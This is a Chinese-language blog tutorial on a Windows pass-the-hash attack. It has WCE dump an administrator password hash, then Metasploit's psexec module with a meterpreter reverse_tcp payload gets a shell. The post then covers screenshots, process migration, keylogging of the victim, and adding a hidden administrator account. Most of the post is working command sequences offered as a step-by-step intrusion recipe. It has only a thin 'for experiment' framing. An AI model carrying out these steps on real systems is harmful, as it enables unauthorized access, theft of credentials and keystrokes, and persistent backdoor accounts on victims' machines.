WINDOWS下傳遞管理員賬號哈希值***

在metasploit中只要有密碼的哈希值就可以***操作系統了不需要明文密碼,下面以實驗爲目的先用工具wce在操作系統上提取管理員密碼的哈希值。

下載wcehttp://1230tt.com/download/wce_v1_4beta_x32.zip

在目標服務器上進入目錄wce -l獲取管理密碼哈希值1AA818381E4E281BAAD3B435B51404EE:5F18A8499CDD4F43D89424AD39CE9AF70

在backtrack裏面進入metasploit選擇windows/smb/psexec模塊,選擇meterpreter***載荷設置LHOST本地IP和RHOST目標主機IP,設置SMBUser用戶名和密碼,然後exploit就可以***了

root@bt:~# msfconsole
msf > use windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.116
msf exploit(psexec) > set RHOST 192.168.1.117
msf exploit(psexec) >set SMBUser administrator
msf exploit(psexec) > set SMBPass 1AA818381E4E281BAAD3B435B51404EE:5F18A8499CDD4F43D89424AD39CE9AF71

在meterpreter下可以截圖meterpreter > screenshot3可以查看系統信息meterpreter > sysinfo4

可以查看系統進程meterpreter > ps,還可以啓用鍵盤記錄,查看系統進程然後監視explore.exe進程啓動鍵盤記錄就可以查看鍵盤記錄了。5meterpreter > migrate 2744

meterpreter > run post/windows/capture/keylog_recorder

6

記錄鍵盤以txt文件保存在root目錄下,cat文件就可以看到目標主機上的鍵盤記錄了。

進入shell添加用戶並提升爲administrators管理員用戶組。

C:\WINDOWS\system32>net user 4 4 /add
C:\WINDOWS\system32>net localgroup administrators 4 /add

78

原文鏈接:http://1230tt.com/archives/233.html

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章